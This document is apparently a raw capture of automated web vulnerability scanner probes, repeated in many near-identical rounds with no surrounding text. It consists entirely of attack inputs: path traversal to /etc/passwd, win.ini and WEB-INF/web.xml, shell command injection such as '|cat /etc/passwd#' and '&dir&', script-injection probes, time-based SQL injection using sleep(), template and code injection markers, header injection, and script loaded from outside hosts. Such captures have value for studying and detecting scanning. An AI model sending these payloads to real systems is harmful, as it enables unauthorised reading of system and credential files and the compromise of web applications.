WEB-INF/web.xml

1

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(970402)>

cat /etc/passwd

1

1

1

-1

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(991341)</sCripT>

WEB-INF\web.xml

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${99755+100174}

1

-1)

1

1&lt

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n932822=v962906

1

1

-1))

\xf6<img acu onmouseover=prompt(953055) //\xf6>

1

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

1

)

1

WDjNpRg9'

1<input autofocus onfocus=prompt(903464)>

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

!(()&&!|*|*|

1

OAYrX9VV')

<a href='http://www.acunetix.com'>website security</a>

testasp.vulnweb.com

'"()

/etc/passwd

1

'

CNXSt38U'))

1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

1

1

'

-1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1_Ss7yT <ScRiPt >prompt(908791)</ScRiPt>

"

1

1

${@print(md5(acunetix_wvs_security_test))}

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

fRApu1fR'

1

1

&dir

1

1

http://hitouSt5VtDcc.bxss.me/

1

acunetix_wvs_invalid_filename

0OnOkvT0')

1

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

comments

http://www.acunetix.tst

1

LKZtY5qV'))

1

1

1

"&dir&"

1

1

/\../\../\../\../\../\../\../etc/passwd

comments

'"

1

1'"()&%<ScRiPt >prompt(965847)</ScRiPt>

1

<!--

comments/.

|dir

1

WEB-INF/web.xml

1

1

1

'"()&%<ScRiPt >prompt(927398)</ScRiPt>

1

WEB-INF\web.xml

1

1

'|dir

1

1

1

1_941602

1

../../../../../../../../../../windows/win.ini

1

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

1

1

acu4156\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4156

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux2921\xc0\xbez1\xc0\xbcz2a\x90bcxuca2921

1

1

1<ScRiPt >prompt(981296)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(944859)</script>

1

1

................windowswin.ini

1<ScRiPt >prompt(900820)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951087></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(904812)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(923533)">

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(948363)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9256892*9810892)

1

1

1<div style=width:expression(prompt(974004))>

1

&cat /etc/passwd&

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9256892*9810892)+'

1

1

1

1<iframe src='data:text/html

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9256892*9810892)+"

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(961391)>

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(992755)>

cat /etc/passwd

1<img src=xyz OnErRor=prompt(951400)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF\web.xml

1<img/src=">" onerror=alert(952319)>

1

`cat /etc/passwd`

1

1

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt%20>prompt(958579)</sCripT>

1

${100241+99347}

|cat /etc/passwd#

1

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

1

1

1

1

'|'ld

-1))

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(989324) //\xf6>

1&n947571=v914464

)

1

1

7gd3KFoD'

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(911708)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

!(()&&!|*|*|

'"()

fHbmD2zN')

1

testasp.vulnweb.com

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

1

/etc/passwd

sJNRQ3FH'))

1

'

1

1

'

1

[url=http://www.acunetix.com]website security[/url]

1

-1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

1_ONuIB <ScRiPt >prompt(911769)</ScRiPt>

-1)

http://hitOpyYrpTPKB.bxss.me/

acunetix_wvs_invalid_filename

1

1

${@print(md5(acunetix_wvs_security_test))}

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

-1))

1

1

comments

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

pMqXG8v6'

&dir

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

zJBH1V11')

1

http://www.acunetix.tst

'&dir&'

q4y41sj8'))

1

1

comments/.

'"

1

file:///etc/passwd

1

1'"()&%<ScRiPt >prompt(971892)</ScRiPt>

1

1

1

"&dir&"

1

<!--

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(907058)</ScRiPt>

1

|dir

1

1

1

WEB-INF/web.xml

1

1_918039

1

1

'|dir

"|dir

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu5718\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5718

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acux5192\xc0\xbez1\xc0\xbcz2a\x90bcxuca5192

................windowswin.ini

1

1

1<ScRiPt >prompt(977739)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(981100)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(990062)</ScRiPt>

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?927269></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(946530)</ScRiPt>

1

response.write(9553815*9015246)

1

1<video><source onerror="javascript:prompt(983978)">

1

'+response.write(9553815*9015246)+'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(984048)"></g></svg>

"+response.write(9553815*9015246)+"

WEB-INF/web.xml

&cat /etc/passwd&

../../../../../../../../../../etc/passwd

1

1<div style=width:expression(prompt(970931))>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<iframe src='data:text/html

'&cat /etc/passwd&'

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(924537)>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(998730)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(919084)>

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

1

1

1

1

1<img/src=">" onerror=alert(910045)>

-1)

1

1

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

${100485+100275}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n912183=v969391

1<ScRiPt%20>prompt(926441)</sCripT>

-1))

1some_inexistent_file_with_long_name%00.jpg

)

1

'|'ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1&lt

mXNzjAiZ'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

/etc/passwd

"|"ld

1

1

\xf6<img acu onmouseover=prompt(907378) //\xf6>

jj6Gsqey')

testasp.vulnweb.com

^(#$!@#$)(()))******

1

'"()

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(994005)>

Vq1lPvHS'))

1

'

1

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

<a href='http://www.acunetix.com'>website security</a>

-1

1

1

1

"

"

1

1

[url=http://www.acunetix.com]website security[/url]

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

1

1

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

1

http://hitTCtlHwWMjf.bxss.me/

1_sr241 <ScRiPt >prompt(998756)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1))

1

1

1

&dir

acunetix_wvs_invalid_filename

1

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

PNY1iYEM'

1

1

1

1

comments

'&dir&'

1

/\../\../\../\../\../\../\../etc/passwd

biJm7pNG')

1

http://www.acunetix.tst

1

1

'"

comments

1'"()&%<ScRiPt >prompt(978103)</ScRiPt>

"&dir&"

TaxOUSBW'))

WEB-INF/web.xml

1

1

1

<!--

'"()&%<ScRiPt >prompt(966439)</ScRiPt>

1

comments/.

|dir

1

WEB-INF\web.xml

1

1

1_982141

'|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

1

acu2482\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2482

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux5383\xc0\xbez1\xc0\xbcz2a\x90bcxuca5383

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1<ScRiPt >prompt(949981)</ScRiPt>

1

................windowswin.ini

1

1

1

1<script>prompt(980458)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(994997)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952982></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(989101)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(954440)">

1

1

response.write(9411218*9155384)

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(943850)"></g></svg>

1

1

1

&cat /etc/passwd&

'+response.write(9411218*9155384)+'

1<div style=width:expression(prompt(965097))>

WEB-INF\web.xml

1

'&cat /etc/passwd&'

"+response.write(9411218*9155384)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

1

1<body onload=prompt(996150)>

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942823)>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(933116)>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

${99302+100362}

1

1<img/src=">" onerror=alert(979418)>

1

`cat /etc/passwd`

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

-1)

1

1<ScRiPt%20>prompt(943571)</sCripT>

1

1

1&n911390=v936961

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

-1))

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

1&lt

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

tcD9rxi8'

'|'ld

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

\xf6<img acu onmouseover=prompt(982460) //\xf6>

'"()

1

testasp.vulnweb.com

'

g7p9Dpqo')

1

"|"ld

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(956137)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

"

1

l6kHSqCs'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

[url=http://www.acunetix.com]website security[/url]

/etc/passwd

1

1

'

1

${@print(md5(acunetix_wvs_security_test))}\

-1)

1

acunetix_wvs_invalid_filename

1_r0a8s <ScRiPt >prompt(916280)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1

-1))

http://hitlleSruisoe.bxss.me/

comments

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

hHXodHCt'

1

||cat /etc/passwd

1

comments/.

1

IgZneFU4')

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

http://www.acunetix.tst

1

1'"()&%<ScRiPt >prompt(967780)</ScRiPt>

'"

1

zPDam7gK'))

1

1

'&dir&'

1

'"()&%<ScRiPt >prompt(987404)</ScRiPt>

<!--

1

1

1

file:///etc/passwd

1

1

1

1

1_901412

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1

|dir

1

1

1

WEB-INF/web.xml

1

1

'|dir

WEB-INF\web.xml

acu1009\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1009

"|dir

1

1

../../../../../../../../../../windows/win.ini

acux8375\xc0\xbez1\xc0\xbcz2a\x90bcxuca8375

1

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(998333)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(919271)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(964167)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?910869></ScRiPt>

1

................windowswin.ini

1

1<ScRiPt >prompt(939802)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1<video><source onerror="javascript:prompt(925153)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(995734)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9304944*9000196)

&cat /etc/passwd&

1

1

1<div style=width:expression(prompt(962807))>

'+response.write(9304944*9000196)+'

'&cat /etc/passwd&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1<iframe src='data:text/html

"+response.write(9304944*9000196)+"

../../../../../../../../../../etc/passwd

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(909273)>

1

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982449)>

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd.jpg

1

1

|cat /etc/passwd#

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1<img src=xyz OnErRor=prompt(922672)>

1

1

1<img/src=">" onerror=alert(945815)>

${99959+100153}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

'|'ld

1&n969500=v953672

1<ScRiPt%20>prompt(913472)</sCripT>

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"|"ld

1&lt

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

\xf6<img acu onmouseover=prompt(945609) //\xf6>

testasp.vulnweb.com

!(()&&!|*|*|

'"()

1

Jdlxt8N3'

1<input autofocus onfocus=prompt(963264)>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

1

^(#$!@#$)(()))******

1

xgkYFrKB')

1

'

<a href='http://www.acunetix.com'>website security</a>

1

/etc/passwd

"

1

1

1

6gOFrr9l'))

[url=http://www.acunetix.com]website security[/url]

1

"

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1

1_lWYBO <ScRiPt >prompt(900087)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1)

http://hitKz9KOzVsog.bxss.me/

1

&dir

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

acunetix_wvs_invalid_filename

-1))

1

1

'&dir&'

1

1

comments

1

EVE2CBEt'

1'"()&%<ScRiPt >prompt(947146)</ScRiPt>

1

"&dir&"

http://www.acunetix.tst

'"

1

1

file:///etc/passwd

comments

'"()&%<ScRiPt >prompt(925801)</ScRiPt>

j7THQSCP')

1

|dir

1

1

<!--

comments/.

1_913059

B9wYcU4z'))

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

1

WEB-INF/web.xml

1

1

1

"|dir

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

../../../../../../../../../../boot.ini

1

1

1

1

acu10200\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10200

1

../../../../../../../../../../windows/win.ini.jpg

acux1450\xc0\xbez1\xc0\xbcz2a\x90bcxuca1450

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(942382)</ScRiPt>

1

1

1

1<script>prompt(961888)</script>

................windowswin.ini

1

1<ScRiPt >prompt(984780)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?972890></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(900587)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(956880)">

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(934024)"></g></svg>

response.write(9003574*9093740)

1

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(999885))>

1

'+response.write(9003574*9093740)+'

WEB-INF\web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<iframe src='data:text/html

1

"+response.write(9003574*9093740)+"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1<body onload=prompt(975148)>

1

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(999667)>

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1

1<img src=xyz OnErRor=prompt(914448)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

-1

1

1<img/src=">" onerror=alert(973310)>

1

1

${99066+99498}

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1

1

1<ScRiPt%20>prompt(998635)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

1

-1))

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n907333=v973983

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

JEaabXEx'

)

1

\xf6<img acu onmouseover=prompt(953460) //\xf6>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

"|"ld

testasp.vulnweb.com

6GSTLkXt')

!(()&&!|*|*|

1<input autofocus onfocus=prompt(933511)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

'"()

^(#$!@#$)(()))******

1

AFkP9Zzw'))

<a href='http://www.acunetix.com'>website security</a>

'

/etc/passwd

1

1

'

1

1

"

-1

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

1

${@print(md5(acunetix_wvs_security_test))}

-1)

1_bxBKG <ScRiPt >prompt(974756)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

acunetix_wvs_invalid_filename

http://hitSKtTHBws0K.bxss.me/

1

||cat /etc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

K5sIOTpa'

comments

&dir

1

1

1

1

wbTZNz6H')

comments

1

http://www.acunetix.tst

'"

1'"()&%<ScRiPt >prompt(929581)</ScRiPt>

1

'&dir&'

1

file:///etc/passwd

comments/.

bXoMCxHk'))

<!--

'"()&%<ScRiPt >prompt(909906)</ScRiPt>

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1_921757

1

1

1

WEB-INF/web.xml

|dir

1

1

1

'|dir

1

WEB-INF\web.xml

1

1

1

1

"|dir

acu6096\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6096

../../../../../../../../../../windows/win.ini

1

1

acux7879\xc0\xbez1\xc0\xbcz2a\x90bcxuca7879

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(946619)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(921194)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(955694)</ScRiPt>

1

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?977277></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(988805)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(930330)">

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9303945*9374299)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(920884)"></g></svg>

1

'+response.write(9303945*9374299)+'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(976408))>

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

"+response.write(9303945*9374299)+"

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd

1<body onload=prompt(959891)>

'&cat /etc/passwd&'

WEB-INF/web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911270)>

